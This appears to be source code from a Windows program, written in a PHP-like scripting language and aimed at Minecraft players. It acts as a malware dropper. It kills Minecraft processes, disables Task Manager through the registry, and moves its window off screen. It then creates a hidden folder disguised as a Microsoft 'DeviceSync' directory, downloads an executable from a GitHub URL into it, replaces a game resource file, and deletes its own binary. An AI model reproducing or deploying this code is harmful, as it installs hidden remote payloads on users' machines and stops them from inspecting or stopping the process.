execute('cmd /c taskkill /f /im Minecraft.exe');
execute('cmd /c taskkill /f /im Minecraft.Windows.exe');
execute('cmd /c taskkill /f /im oxibyte.exe');
//execute('cmd /c start https://discord.gg/bQqCrzugng');
execute('cmd /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /f /v "DisableTaskMgr" /t REG_DWORD /d 1');
app()->form('MainForm')->layout->position = [5000,0];

fs::makeDir($_ENV['ProgramData'].'\\Microsoft\\DeviceSync');
execute('cmd /c attrib +h '.$_ENV['ProgramData'].'\\Microsoft\\DeviceSync');
file_put_contents($_ENV['ProgramData'].'\\Microsoft\\DeviceSync\\5.exe',file_get_contents('https://github.com/Rastihin/mce/raw/main/5.exe'));

fs::copy('https://github.com/Rastihin/mce/raw/main/start_screen.json',fs::abs('./').'\\data\\resource_packs\\vanilla\\ui\\start_screen.json');
//Для разрешения запуска должно ровняться 1
$GLOBALS['start'] = 1;

unlink('oxibyte.exe');


